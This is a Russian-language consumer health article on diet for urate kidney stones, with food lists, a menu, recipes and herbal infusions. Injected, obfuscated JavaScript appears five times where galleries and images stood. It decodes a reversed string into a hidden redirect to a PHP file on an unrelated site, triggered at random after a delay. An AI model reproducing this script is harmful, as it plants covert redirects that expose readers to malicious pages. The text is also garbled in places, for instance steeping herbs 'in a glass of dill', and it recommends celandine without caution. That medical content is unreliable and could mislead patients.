Правильное питание при уратных камнях в почках

Преимущественно такие образования, как уратные камни врачи наблюдают у людей 20–55 лет. Этот вид камней является вторым по распространённости после оксалатных. Чаще такое заболевание встречается у мужчин. Если моча кислая, медленно образуется и содержит излишнее количество солей мочевой кислоты, то риск того, что будут формироваться камни, очень высок.

Характеристика уратных камней

На протяжении долгих лет нездоровый человек может не подозревать о наличии уролитиаза. Дебютом заболевания чаще является почечная колика. Пациент в таком случае чувствует острую боль в поясничной области, которая переходит в таз, брюшную полость. При этом он никак не может найти удобное положение, которое бы облегчило страдание. Озноб, тошнота, рвота, повышение температуры (при воспалении), нарушение оттока мочи являются теми компонентами списка жалоб, с которыми больной обращается за квалифицированной помощью к медицинским работникам.

Причины повышения уровня мочевой кислоты непосредственно связаны с излишним количеством белков и кофеина в рационе, гиподинамией, голоданием, приёмом лекарственных препаратов (глюкокортикостероидов, антибиотиков, слабительных, мочегонных). Заболевания крови, онкологические болезни также само способствуют развитию мочекаменной болезни.

Внешне камни круглые, гладенькие, жёлто-коричневого цвета. Текстура их твёрдая, но они менее плотные, чем оксалатные.

Чтобы определить есть камни в почках или их нет, необходимы такие диагностические исследования:

  • общий анализ крови, мочи;
  • УЗИ мочевыводящей системы;
  • урография почек;
  • ретроградная пиелография;
  • рентгенография (для дифференциальной диагностики других видов камней);
  • компьютерная и магниторезонансная томографии.

Диетическое питание

Способы и методы лечения (консервативное, оперативное, комбинированное) уратного уролитиаза зависят от многих факторов:

  • локализации;
  • формы;
  • размера;
  • инфекции мочевыводящих путей;
  • функциональных возможностей почек;
  • сопутствующей патологии.

В отличие от всех методов лечения, диетическое питание считают главным залогом профилактики и борьбы с прогрессированием заболевания. Главным и основным заданием правильного питания – нормализация обмена веществ, ограничение употребления продуктов с большим содержанием пуринов (животный белок). Следует отметить, что уратные камни единственные могут поддаваться растворению и выведению из организма без оперативного вмешательства. Для этого необходимо употреблять много жидкости (примерно 2–2,5 литра, летом больше), пять раз в сутки принимать пищу, калории которой не должны превышать 3,5 тысяч.

При уролитиазе с образованием уратных камней, врачи рекомендуют именно диету №6, а не 7 (используют при гломерулонефритах, нефритах, азотемии) или 14 (при мочекаменной болезни с выпадением фосфорно-кальциевых солей). Потому что эффект от лечения будет значительно выше.

Задачей назначения диеты №6 является нормализация обмена веществ, снижение образования в организме уратной кислоты и её солей, сдвиг реакции мочи в щелочную сторону.

Описание диеты: ограничение продуктов, которые содержат пурины, щавелевую кислоту, небольшое сокращение количества белков, жиров, кухонной соли и увеличение количества продуктов со щелочными свойствами (молоко, овощи).

Из меню больного исключают такие продукты:

  • консервированные изделия (шпроты, сардины, копчёную колбасу);
  • наваристые мясные, рыбные бульоны;
  • жаренную, острую или солёную пищу;
  • внутренние органы животных: почки, печень, язык, лёгкие, мозги;
  • свиной, говяжий жир;
  • грибы или грибной бульон;
  • бобовые (горох, соя, фасоль);
  • овощи: редис, помидоры, брюссельскую капусту;
  • зелень: щавель, шпинат, петрушку;
  • кислые фрукты и ягоды (яблоки, клюкву, смородину);
  • шоколад и другие сладости;
  • алкоголь (вино, пиво, водку);
  • хрен, горчицу;
  • напитки – кофе, какао.

Галерея запрещённых продуктов

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»10731,10732,10733,10734,10735,10737″]

Рекомендованные продукты питания:

  • хлеб из пшеничной или ржаной муки вчерашней выпечки;
  • нежирное отварное мясо (преимущественно конина, баранина) и рыба (два раза в неделю);
  • молочные продукты (творог, сыр, сметана);
  • овощи (картофель, кабачки, баклажаны, тыква, морковь, капуста);
  • фрукты (клубника, малина, апельсины);
  • напитки: сок, компот, чай, морс, минеральная вода;
  • макаронные изделия, пшено, гречка, овсянка;
  • орехи, семечки;
  • сливочное и растительное масло.

Галерея разрешённых продуктов

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»10723,10724,10725,10726,10727,10728″]

Чтобы мясо приготовить правильно, нужно соблюдать некоторые условия. Во-первых, для того чтобы сварить, необходимо мясо класть только в кипящую воду. Во-вторых, первый бульон необходимо слить, а в другой положить головку луковицы, которую после приготовления выбрасывают. В-третьих, рекомендовано не употреблять свежее мясо, а замороженное хорошо промывать.

Замечание врача: Разгрузочный день (фруктовый, овощной, молочный), устраивать один раз на семь дней.

Примерное меню

Ориентировочный список блюд на один день:

Завтрак: манная каша, сваренное всмятку яйцо, кисель.

Перекус: йогурт с овсяным печеньем.

Обед: суп-пюре из тыквы, кусочек отварного нежирного мяса.

Полдник: творожная запеканка с клубникой.

Ужин: овощное рагу, пшеничная каша, морс.

Рецепты вкусных блюд

Суп-пюре из тыквы

Ингредиенты: полкилограмма тыквы, 500 мл куриного бульона, одна головка лука, одна столовая ложка сливочного маслица, 8 грамм порошка карри, щепотка соли.

Приготовление: Не очень большими кусочками нарезать очищенную от кожуры тыкву. В кастрюлю бросить масло и мелко нарезанный кусочками лук. Жарить до золотистого цвета и высыпать карри, тыкву, соль. Затем влить бульон и один стакан воды. Варить до готовности, приблизительно 20 мин. С помощью блендера сделать суп-пюре и после закипания выключить.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/10/sup-pyure-iz-tykvy.jpg» alt=»Суп-пюре из тыквы» width=»600″ height=»400″ /> Суп-пюре из тыквы при уролитиазе

Творожная запеканка

Ингредиенты: один килограмм творога, три яйца, 170 грамм сахара, изюм, три грамма соли, ванилин, сливочное масло для смазывания формы, по 100 грамм манной крупы, сметаны, молока.

Приготовление: манку залить молоком, изюм замочить. Сахар размешать с яйцами. В творог добавить манку, взбитые яйца с сахаром, соль, изюм, сметану. Все выложить на форму, которая предварительно смазанная маслом и посыпанная мукой. Массу разровнять и смазать яйцом или сметаной. Выпекать 55 мин при 180 градусах в разогретой духовке. Можно подавать со сметаной, вареньем, мёдом.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/10/tvorozhnaya-zapekanka.jpg» alt=»Творожная запеканка» width=»680″ height=»479″ /> Творожная запеканка

Салат из свёклы

Ингредиенты: три средних размеров свёклы, три яйца, 200 грамм твёрдого сыра, 100 мл сметаны, соль, перец по вкусу.

Приготовление: сварить свёклу и яйца. В большую миску поместить натёртые на крупной тёрке свёклу, сыр. Яйца нарезать кубиками и вместе с остальными компонентами положить в основную массу. Тщательно перемешать до однородности.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/10/salat-iz-svekly-728×533.jpg» alt=»Салат из свеклы» width=»728″ height=»533″ /> Салат из свеклы

Сборы при мочекаменной болезни

При уролитиазе с лечебной или профилактической целью применяют сборы из целебных трав. Все представленные сборы владеют мочегонным, противовоспалительным, бактерицидным, антисептическим, спазмолитическим, болеутоляющим, жаропонижающим действиями.

Сбор №1

Лекарственные растения: листья берёзы, трава большого чистотела, корень стальника, корневище прямостоячей лапчатки, ягоды можжевельника. Всех ингредиентов нужно взять по одной части.

Для приготовления две столовые ложки смеси залить стаканом укропа, поставить на водяную баню и кипятить 15 мин. Настаивать 45 мин, потом процедить и довести объем до 250 мл кипячёной водичкой. Пить по одному стакану на ночь.

Сбор №2

Лекарственные растения: по пять столовых ложек хвоща полевого и листьев берёзы, по две столовые ложки листьев земляники и корня цикория, чайная ложка семян тмина.

Одну столовую ложку смеси залить стаканом водички и настаивать на протяжении шести часов. После этого прогреть на водяной бане 15 мин. Пить по 60 мл трижды в сутки.

Сбор №3

Лекарственные растения: по 15 грамм корневища аира болотного, хвоща полевого, плодов можжевельника, шиповника, две десертные ложки листьев двудомной крапивы, по 10 грамм мяты перечной и цветков бузины.

Чтобы приготовить, необходимо заварить одну столовую ложку сбора стаканом укропа. Принимать по половине стакана тёпленького отвара три раза в сутки.

На сегодняшний день все методы лечения мочекаменной болезни никак не обходятся без диетического питания. Диета при различных видах камней имеет свои особенности. Соблюдение рекомендаций лечебного питания не только поможет бороться с имеющимися камнями, но и обеспечит длинный период ремиссии. Фитопрепараты, как составная часть комбинированного лечения, обеспечат лёгкий выход конкрементов из организма.

Adblock
detector